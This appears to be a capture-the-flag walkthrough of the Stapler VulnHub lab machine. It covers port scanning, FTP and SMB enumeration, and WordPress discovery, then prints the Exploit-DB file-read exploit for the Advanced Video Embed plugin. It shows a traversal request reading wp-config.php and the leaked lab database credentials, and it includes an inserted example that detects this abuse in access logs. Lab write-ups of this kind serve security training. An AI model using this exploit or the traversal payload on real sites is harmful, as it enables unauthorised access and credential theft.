
STAPLER: 1

Information About the Machine

Description:
Average beginner/intermediate VM, only a few twists
May find it easy/hard (depends on YOUR background)
...also which way you attack the box
It SHOULD work on both VMware and Virtualbox
REBOOT the VM if you CHANGE network modes
Fusion users, you'll need to retry when importing

Vulnhub Page:
http://144.76.171.171/blog/index.php/fristileaks-1-3/

Download Page: https://download.vulnhub.com/stapler/Stapler.zip

Walkthrough

First, let's start by finding the IP address of the target machine.

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# ifconfig eth0                                                                                                                                       130 ⨯
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.0.21  netmask 255.255.255.0  broadcast 192.168.0.255
        inet6 fe80::20c:29ff:fe4a:4d3f  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:4a:4d:3f  txqueuelen 1000  (Ethernet)
        RX packets 5680  bytes 995112 (971.7 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 9958  bytes 1268241 (1.2 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# arp-scan -l | grep 08:00:27:ba:ad:72
192.168.0.25    08:00:27:ba:ad:72   PCS Systemtechnik GmbH

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# 

Let's run an nmap scan.

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# nmap 192.168.0.25 -p- -A    
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-29 19:44 EDT
Nmap scan report for 192.168.0.25
Host is up (0.0010s latency).
Not shown: 65523 filtered ports
PORT      STATE  SERVICE     VERSION
20/tcp    closed ftp-data
21/tcp    open   ftp         vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.0.21
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
|   256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_  256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519)
53/tcp    open   domain      dnsmasq 2.75
| dns-nsid: 
|_  bind.version: dnsmasq-2.75
80/tcp    open   http        PHP cli server 5.5 or later
|_http-title: 404 Not Found
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp   open   doom?
| fingerprint-strings: 
|   NULL: 
|     message2.jpgUT 
|     QWux
|     "DL[E
|     #;3[
|     \xf6
|     u([r
|     qYQq
|     Y_?n2
|     3&M~{
|     9-a)T
|     L}AJ
|_    .npy.9
3306/tcp  open   mysql       MySQL 5.7.12-0ubuntu1
| mysql-info: 
|   Protocol: 10
|   Version: 5.7.12-0ubuntu1
|   Thread ID: 8
|   Capabilities flags: 63487
|   Some Capabilities: IgnoreSpaceBeforeParenthesis, Support41Auth, DontAllowDatabaseTableColumn, SupportsTransactions, FoundRows, Speaks41ProtocolOld, Speaks41ProtocolNew, InteractiveClient, LongPassword, SupportsCompression, ConnectWithDatabase, IgnoreSigpipes, LongColumnFlag, SupportsLoadDataLocal, ODBCClient, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
|   Status: Autocommit
|   Salt: \x07{J\I;+o\x08\x03r\x17j\x16\x1F\x10m=\x16\x08
|_  Auth Plugin Name: mysql_native_password
12380/tcp open   http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port666-TCP:V=7.91%I=7%D=5/29%Time=60B2D232%P=x86_64-pc-linux-gnu%r(NUL
SF:L,1350,"PK\x03\x04\x14\0\x02\0\x08\0d\x80\xc3Hp\xdf\x15\x81\xaa,\0\0\x1
SF:52\0\0\x0c\0\x1c\0message2\.jpgUT\t\0\x03\+\x9cQWJ\x9cQWux\x0b\0\x01\x0
SF:4\xf5\x01\0\0\x04\x14\0\0\0\xadz\x0bT\x13\xe7\xbe\xefP\x94\x88\x88A@\xa
SF:2\x20\x19\xabUT\xc4T\x11\xa9\x102>\x8a\xd4RDK\x15\x85Jj\xa9\"DL\[E\xa2\
SF:x0c\x19\x140<\xc4\xb4\xb5\xca\xaen\x89\x8a\x8aV\x11\x91W\xc5H\x20\x0f\x
SF:b2\xf7\xb6\x88\n\x82@%\x99d\xb7\xc8#;3\[\r_\xcddr\x87\xbd\xcf9\xf7\xaeu
SF:\xeeY\xeb\xdc\xb3oX\xacY\xf92\xf3e\xfe\xdf\xff\xff\xff=2\x9f\xf3\x99\xd
SF:3\x08y}\xb8a\xe3\x06\xc8\xc5\x05\x82>`\xfe\x20\xa7\x05:\xb4y\xaf\xf8\xa
SF:0\xf8\xc0\^\xf1\x97sC\x97\xbd\x0b\xbd\xb7nc\xdc\xa4I\xd0\xc4\+j\xce\[\x
SF:87\xa0\xe5\x1b\xf7\xcc=,\xce\x9a\xbb\xeb\xeb\xdds\xbf\xde\xbd\xeb\x8b\x
SF:f4\xfdis\x0f\xeeM\?\xb0\xf4\x1f\xa3\xcceY\xfb\xbe\x98\x9b\xb6\xfb\xe0\x
SF:dc\]sS\xc5bQ\xfa\xee\xb7\xe7\xbc\x05AoA\x93\xfe9\xd3\x82\x7f\xcc\xe4\xd
SF:5\x1dx\xa2O\x0e\xdd\x994\x9c\xe7\xfe\x871\xb0N\xea\x1c\x80\xd63w\xf1\xa
SF:f\xbd&&q\xf9\x97'i\x85fL\x81\xe2\\\xf6\xb9\xba\xcc\x80\xde\x9a\xe1\xe2:
SF:\xc3\xc5\xa9\x85`\x08r\x99\xfc\xcf\x13\xa0\x7f{\xb9\xbc\xe5:i\xb2\x1bk\
SF:x8a\xfbT\x0f\xe6\x84\x06/\xe8-\x17W\xd7\xb7&\xb9N\x9e<\xb1\\\.\xb9\xcc\
SF:xe7\xd0\xa4\x19\x93\xbd\xdf\^\xbe\xd6\xcdg\xcb\.\xd6\xbc\xaf\|W\x1c\xfd
SF:\xf6\xe2\x94\xf9\xebj\xdbf~\xfc\x98x'\xf4\xf3\xaf\x8f\xb9O\xf5\xe3\xcc\
SF:x9a\xed\xbf`a\xd0\xa2\xc5KV\x86\xad\n\x7fou\xc4\xfa\xf7\xa37\xc4\|\xb0\
SF:xf1\xc3\x84O\xb6nK\xdc\xbe#\)\xf5\x8b\xdd{\xd2\xf6\xa6g\x1c8\x98u\(\[r\
SF:xf8H~A\xe1qYQq\xc9w\xa7\xbe\?}\xa6\xfc\x0f\?\x9c\xbdTy\xf9\xca\xd5\xaak
SF:\xd7\x7f\xbcSW\xdf\xd0\xd8\xf4\xd3\xddf\xb5F\xabk\xd7\xff\xe9\xcf\x7fy\
SF:xd2\xd5\xfd\xb4\xa7\xf7Y_\?n2\xff\xf5\xd7\xdf\x86\^\x0c\x8f\x90\x7f\x7f
SF:\xf9\xea\xb5m\x1c\xfc\xfef\"\.\x17\xc8\xf5\?B\xff\xbf\xc6\xc5,\x82\xcb\
SF:[\x93&\xb9NbM\xc4\xe5\xf2V\xf6\xc4\t3&M~{\xb9\x9b\xf7\xda-\xac\]_\xf9\x
SF:cc\[qt\x8a\xef\xbao/\xd6\xb6\xb9\xcf\x0f\xfd\x98\x98\xf9\xf9\xd7\x8f\xa
SF:7\xfa\xbd\xb3\x12_@N\x84\xf6\x8f\xc8\xfe{\x81\x1d\xfb\x1fE\xf6\x1f\x81\
SF:xfd\xef\xb8\xfa\xa1i\xae\.L\xf2\\g@\x08D\xbb\xbfp\xb5\xd4\xf4Ym\x0bI\x9
SF:6\x1e\xcb\x879-a\)T\x02\xc8\$\x14k\x08\xae\xfcZ\x90\xe6E\xcb<C\xcap\x8f
SF:\xd0\x8f\x9fu\x01\x8dvT\xf0'\x9b\xe4ST%\x9f5\x95\xab\rSWb\xecN\xfb&\xf4
SF:\xed\xe3v\x13O\xb73A#\xf0,\xd5\xc2\^\xe8\xfc\xc0\xa7\xaf\xab4\xcfC\xcd\
SF:x88\x8e}\xac\x15\xf6~\xc4R\x8e`wT\x96\xa8KT\x1cam\xdb\x99f\xfb\n\xbc\xb
SF:cL}AJ\xe5H\x912\x88\(O\0k\xc9\xa9\x1a\x93\xb8\x84\x8fdN\xbf\x17\xf5\xf0
SF:\.npy\.9\x04\xcf\x14\x1d\x89Rr9\xe4\xd2\xae\x91#\xfbOg\xed\xf6\x15\x04\
SF:xf6~\xf1\]V\xdcBGu\xeb\xaa=\x8e\xef\xa4HU\x1e\x8f\x9f\x9bI\xf4\xb6GTQ\x
SF:f3\xe9\xe5\x8e\x0b\x14L\xb2\xda\x92\x12\xf3\x95\xa2\x1c\xb3\x13\*P\x11\
SF:?\xfb\xf3\xda\xcaDfv\x89`\xa9\xe4k\xc4S\x0e\xd6P0");
MAC Address: 08:00:27:BA:AD:72 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h39m58s, deviation: 34m37s, median: 2h59m57s
|_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
|   Computer name: red
|   NetBIOS computer name: RED\x00
|   Domain name: \x00
|   FQDN: red
|_  System time: 2021-05-30T03:46:06+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-05-30T02:46:05
|_  start_date: N/A

TRACEROUTE
HOP RTT     ADDRESS
1   1.03 ms 192.168.0.25

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 154.42 seconds

Now let's take stock. Anonymous FTP login is available, and we have SSH, HTTP servers, MySQL and Samba. There are a lot of services to gather information from. Let's get started.

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# ftp 192.168.0.25 
Connected to 192.168.0.25.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220 
Name (192.168.0.25:kali): Anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             107 Jun 03  2016 note
226 Directory send OK.
ftp> get note
local: note remote: note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
226 Transfer complete.
107 bytes received in 0.00 secs (37.0015 kB/s)
ftp> bye
221 Goodbye.

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# cat note                                  
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.

I think we have picked up some usernames. After that I ran an enum4linux scan. Its output is below:


 ========================================= 
|    Share Enumeration on 192.168.0.25    |
 ========================================= 

    Sharename       Type      Comment
    ---------       ----      -------
    print$          Disk      Printer Drivers
    kathy           Disk      Fred, What are we doing here?
    tmp             Disk      All temporary files should be stored here
    IPC$            IPC       IPC Service (red server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 192.168.0.25
//192.168.0.25/print$   Mapping: DENIED, Listing: N/A
//192.168.0.25/kathy    Mapping: OK, Listing: OK
//192.168.0.25/tmp  Mapping: OK, Listing: OK
//192.168.0.25/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

...

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\peter (Local User)
S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1002 Unix User\ETollefson (Local User)
S-1-22-1-1003 Unix User\DSwanger (Local User)
S-1-22-1-1004 Unix User\AParnell (Local User)
S-1-22-1-1005 Unix User\SHayslett (Local User)
S-1-22-1-1006 Unix User\MBassin (Local User)
S-1-22-1-1007 Unix User\JBare (Local User)
S-1-22-1-1008 Unix User\LSolum (Local User)
S-1-22-1-1009 Unix User\IChadwick (Local User)
S-1-22-1-1010 Unix User\MFrei (Local User)
S-1-22-1-1011 Unix User\SStroud (Local User)
S-1-22-1-1012 Unix User\CCeaser (Local User)
S-1-22-1-1013 Unix User\JKanode (Local User)
S-1-22-1-1014 Unix User\CJoo (Local User)
S-1-22-1-1015 Unix User\Eeth (Local User)
S-1-22-1-1016 Unix User\LSolum2 (Local User)
S-1-22-1-1017 Unix User\JLipps (Local User)
S-1-22-1-1018 Unix User\jamie (Local User)
S-1-22-1-1019 Unix User\Sam (Local User)
S-1-22-1-1020 Unix User\Drew (Local User)
S-1-22-1-1021 Unix User\jess (Local User)
S-1-22-1-1022 Unix User\SHAY (Local User)
S-1-22-1-1023 Unix User\Taylor (Local User)
S-1-22-1-1024 Unix User\mel (Local User)
S-1-22-1-1025 Unix User\kai (Local User)
S-1-22-1-1026 Unix User\zoe (Local User)
S-1-22-1-1027 Unix User\NATHAN (Local User)
S-1-22-1-1028 Unix User\www (Local User)
S-1-22-1-1029 Unix User\elly (Local User)

We have obtained users and shared folders. Let's take a look at them.

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# smbclient //192.168.0.25/kathy
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jun  3 12:52:52 2016
  ..                                  D        0  Mon Jun  6 17:39:56 2016
  kathy_stuff                         D        0  Sun Jun  5 11:02:27 2016
  backup                              D        0  Sun Jun  5 11:04:14 2016

        19478204 blocks of size 1024. 16397096 blocks available
smb: \> cd kathy_stuff
smb: \kathy_stuff\> ls
  .                                   D        0  Sun Jun  5 11:02:27 2016
  ..                                  D        0  Fri Jun  3 12:52:52 2016
  todo-list.txt                       N       64  Sun Jun  5 11:02:27 2016

        19478204 blocks of size 1024. 16397096 blocks available
smb: \kathy_stuff\> get todo-list.txt
getting file \kathy_stuff\todo-list.txt of size 64 as todo-list.txt (10.4 KiloBytes/sec) (average 10.4 KiloBytes/sec)
smb: \kathy_stuff\> cd ..
smb: \> ls
  .                                   D        0  Fri Jun  3 12:52:52 2016
  ..                                  D        0  Mon Jun  6 17:39:56 2016
  kathy_stuff                         D        0  Sun Jun  5 11:02:27 2016
  backup                              D        0  Sun Jun  5 11:04:14 2016

        19478204 blocks of size 1024. 16397096 blocks available
smb: \> cd backup\
smb: \backup\> ls
  .                                   D        0  Sun Jun  5 11:04:14 2016
  ..                                  D        0  Fri Jun  3 12:52:52 2016
  vsftpd.conf                         N     5961  Sun Jun  5 11:03:45 2016
  wordpress-4.tar.gz                  N  6321767  Mon Apr 27 13:14:46 2015

        19478204 blocks of size 1024. 16397096 blocks available
smb: \backup\> get vsftpd.conf
getting file \backup\vsftpd.conf of size 5961 as vsftpd.conf (646.8 KiloBytes/sec) (average 392.3 KiloBytes/sec)
smb: \backup\> exit

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# ls
note  todo-list.txt  vsftpd.conf

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# cat todo-list.txt                         
I'm making sure to backup anything important for Initech, Kathy

┌──(root💀kali)-[/home/kali/oscp/stapler/wordpress]
└─# smbclient //192.168.0.25/tmp  
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Jun  7 04:08:39 2016
  ..                                  D        0  Mon Jun  6 17:39:56 2016
  ls                                  N      274  Sun Jun  5 11:32:58 2016

smb: \> exit

┌──(root💀kali)-[/home/kali/oscp/stapler/wordpress]
└─# cat ls         
.:
total 12.0K
drwxrwxrwt  2 root root 4.0K Jun  5 16:32 .
drwxr-xr-x 16 root root 4.0K Jun  3 22:06 ..
-rw-r--r--  1 root root    0 Jun  5 16:32 ls
drwx------  3 root root 4.0K Jun  5 15:32 systemd-private-df2bff9b90164a2eadc490c0b8f76087-systemd-timesyncd.service-vFKoxJ

The information I gathered about SMB is above. Let's move on. Nikto really is a tool that deserves credit; the information it gave me made my job much easier.

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# nikto -h http://192.168.0.25:12380/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.0.25
+ Target Hostname:    192.168.0.25
+ Target Port:        12380
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/[email protected]
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/[email protected]
+ Start Time:         2021-05-29 20:12:28 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Hostname '192.168.0.25' does not match certificate's names: Red.Initech
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 8071 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2021-05-29 20:23:38 (GMT-4) (670 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The server that normally gave me a 400 code when I went to it over HTTP returned a 200 when I went to it over HTTPS. I found a WordPress site and ran a wpscan scan using the API. Of course there were many findings here, but the most important one was the advanced-video-embed-embed-videos-or-playlists/ plugin I found at https://192.168.0.25:12380/blogblog/wp-content/plugins/.

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# searchsploit advanced video wordpress
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                             |  Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin Advanced Video 1.0 - Local File Inclusion                                                                                                                                                 | php/webapps/39646.py
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# locate php/webapps/39646.py                             
/usr/share/exploitdb/exploits/php/webapps/39646.py
┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# cp /usr/share/exploitdb/exploits/php/webapps/39646.py . 

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# cat 39646.py                                           
#!/usr/bin/env python

# Exploit Title: Advanced-Video-Embed Arbitrary File Download / Unauthenticated Post Creation
# Google Dork: N/A
# Date: 04/01/2016
# Exploit Author: evait security GmbH
# Vendor Homepage: arshmultani - http://dscom.it/
# Software Link: https://wordpress.org/plugins/advanced-video-embed-embed-videos-or-playlists/
# Version: 1.0
# Tested on: Linux Apache / WordPress 4.2.2

#   Timeline
#   03/24/2016 - Bug discovered
#   03/24/2016 - Initial notification of vendor
#   04/01/2016 - No answer from vendor, public release of bug 

# Vulnerable Code (/inc/classes/class.avePost.php) Line 57:

#  function ave_publishPost(){
#    $title = $_REQUEST['title'];
#    $term = $_REQUEST['term'];
#    $thumb = $_REQUEST['thumb'];
# <snip>
# Line 78:
#    $image_data = file_get_contents($thumb);

# POC - http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILEPATH]

# Exploit - Print the content of wp-config.php in terminal (default WordPress config)

import random
import urllib2
import re

url = "http://127.0.0.1/wordpress" # insert url to wordpress

randomID = long(random.random() * 100000000000000000L)

objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php')
content =  objHtml.readlines()
for line in content:
    numbers = re.findall(r'\d+',line)
    id = numbers[-1]
    id = int(id) / 10

objHtml = urllib2.urlopen(url + '/?p=' + str(id))
content = objHtml.readlines()

for line in content:
    if 'attachment-post-thumbnail size-post-thumbnail wp-post-image' in line:
        urls=re.findall('"(https?://.*?)"', line)
        print urllib2.urlopen(urls[0]).read()     

Our plugin is also version 1, so the versions match, and there is an exploit for it. After reading the code I carried out the steps myself: I sent a request of the form https://192.168.0.25:12380/blogblog//wp-admin/admin-ajax.php?action=ave_publishPost&title=1822&short=rnd&term=rnd&thumb=../wp-config.php. Then I went to the https://192.168.0.25:12380/blogblog/wp-content/uploads/ folder in the browser and downloaded the images there to my Kali machine. When I read those image files with cat, I got the data I was after.
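The request above works because the plugin's `ave_publishPost` action is reachable through admin-ajax.php without authentication and, as the exploit header shows, passes the `thumb` parameter straight to `file_get_contents()`. The Python script below is an added example, not part of this walkthrough or of the plugin, showing how a defender would spot that abuse in Apache access logs: it parses combined-format lines (constructed here in the shape of the request made above), decodes the query string and flags `ave_publishPost` calls whose `thumb` value is a path traversal, a bare local path or a non-HTTP scheme. The log layout, the sample lines and the classification rules are assumptions made for the example.

```python
# Added example, not from the original walkthrough: detect abuse of the
# Advanced Video Embed plugin's unauthenticated ave_publishPost action in
# Apache "combined" access logs. The log lines are constructed for this example.
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlparse

# Constructed sample log: one traversal read of wp-config.php, one fetch of the
# resulting "image", one legitimate remote thumbnail, one file:// read, one page view.
SAMPLE_LOG = """\
192.168.0.21 - - [29/May/2021:21:05:11 +0100] "GET /blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=1822&short=rnd&term=rnd&thumb=../wp-config.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
192.168.0.21 - - [29/May/2021:21:05:40 +0100] "GET /blogblog/wp-content/uploads/1022270830.jpeg HTTP/1.1" 200 3042 "-" "Wget/1.21"
192.168.0.30 - - [29/May/2021:21:06:02 +0100] "GET /blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=x&term=1&thumb=https://img.example.invalid/a.jpg HTTP/1.1" 200 12 "-" "Mozilla/5.0"
192.168.0.30 - - [29/May/2021:21:06:30 +0100] "GET /blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=x&term=1&thumb=file:///etc/passwd HTTP/1.1" 200 12 "-" "curl/7.74"
192.168.0.31 - - [29/May/2021:21:07:00 +0100] "GET /blogblog/?p=182 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Apache combined format: client, identd, user, [timestamp], "request", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def thumb_is_suspicious(thumb: str) -> Optional[str]:
    """Return why a thumb value could read a local file, or None if it looks like a remote image URL."""
    parsed = urlparse(thumb)
    scheme = parsed.scheme.lower()
    if scheme in ("http", "https"):
        return None  # fetching a remote thumbnail is the plugin's intended use
    if scheme:
        return f"non-http scheme {scheme!r}"  # file://, php://, etc.
    if ".." in thumb.split("/"):
        return "path traversal"
    return "local path (no scheme)"


def find_ave_file_reads(log_text: str) -> List[Dict[str, object]]:
    """Scan access-log lines and report ave_publishPost calls with a suspicious thumb parameter."""
    findings: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        path, _, query = m.group("target").partition("?")
        if not path.endswith("/wp-admin/admin-ajax.php"):
            continue
        params = parse_qs(query)  # also percent-decodes encoded traversal sequences
        if params.get("action", [""])[0] != "ave_publishPost":
            continue
        for thumb in params.get("thumb", []):
            reason = thumb_is_suspicious(thumb)
            if reason:
                findings.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "thumb": thumb,
                    "reason": reason,
                    "status": int(m.group("status")),
                })
    return findings


if __name__ == "__main__":
    for f in find_ave_file_reads(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} thumb={f['thumb']!r} -> {f['reason']} (HTTP {f['status']})")
```

A 200 status on the admin-ajax request does not tell you whether the read succeeded; the follow-up fetch of a freshly created file under wp-content/uploads (the second sample line) is the confirmation to look for next to each finding.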


┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# wget https://192.168.0.25:12380/blogblog/wp-content/uploads/1022270830.jpeg --no-check-certificate                                            
--2021-05-29 21:09:24--  https://192.168.0.25:12380/blogblog/wp-content/uploads/1022270830.jpeg
Connecting to 192.168.0.25:12380... connected.
WARNING: The certificate of ‘192.168.0.25’ is not trusted.
WARNING: The certificate of ‘192.168.0.25’ doesn't have a known issuer.
The certificate's owner does not match hostname ‘192.168.0.25’
HTTP request sent, awaiting response... 200 OK
Length: 3042 (3.0K) [image/jpeg]
Saving to: ‘1022270830.jpeg’

1022270830.jpeg                                             100%[========================================================================================================================================>]   2.97K  --.-KB/s    in 0s      

2021-05-29 21:09:24 (66.0 MB/s) - ‘1022270830.jpeg’ saved [3042/3042]

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# ls                                                                                                                                            
1022270830.jpeg  39646.py  cer.cer  note  todo-list.txt  vsftpd.conf  wordpress  wordpress-4.tar.gz  wpresult

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# cat 1022270830.jpeg                                                                                                                           
<?php
/**
 * The base configurations of the WordPress.
 *
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, and ABSPATH. You can find more information by visiting
 * {@link https://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
 * Codex page. You can get the MySQL settings from your web host.
 *
 * This file is used by the wp-config.php creation script during the
 * installation. You don't have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'plbkac');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         'V 5p=[.Vds8~SX;>t)++Tt57U6{Xe`T|oW^eQ!mHr }]>9RX07W<sZ,I~`6Y5-T:');
define('SECURE_AUTH_KEY',  'vJZq=p.Ug,]:<-P#A|k-+:;JzV8*pZ|K/U*J][Nyvs+}&!/#>4#K7eFP5-av`n)2');
define('LOGGED_IN_KEY',    'ql-Vfg[?v6{ZR*+O)|Hf OpPWYfKX0Jmpl8zU<cr.wm?|jqZH:YMv;zu@tM7P:4o');
define('NONCE_KEY',        'j|V8J.~n}R2,mlU%?C8o2[~6Vo1{Gt+4mykbYH;HDAIj9TE?QQI!VW]]D`3i73xO');
define('AUTH_SALT',        'I{gDlDs`Z@.+/AdyzYw4%+<WsO-LDBHT}>}!||Xrf@1E6jJNV={p1?yMKYec*OI$');
define('SECURE_AUTH_SALT', '.HJmx^zb];5P}hM-uJ%^+9=0SBQEh[[*>#z+p>nVi10`XOUq (Zml~op3SG4OG_D');
define('LOGGED_IN_SALT',   '[Zz!)%R7/w37+:9L#.=hL:cyeMM2kTx&_nP4{D}n=y=FQt%zJw>c[a+;ppCzIkt;');
define('NONCE_SALT',       'tb(}BfgB7l!rhDVm{eK6^MSN-|o]S]]axl4TE_y+Fi5I-RxN/9xeTsK]#ga_9:hJ');

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each a unique
 * prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
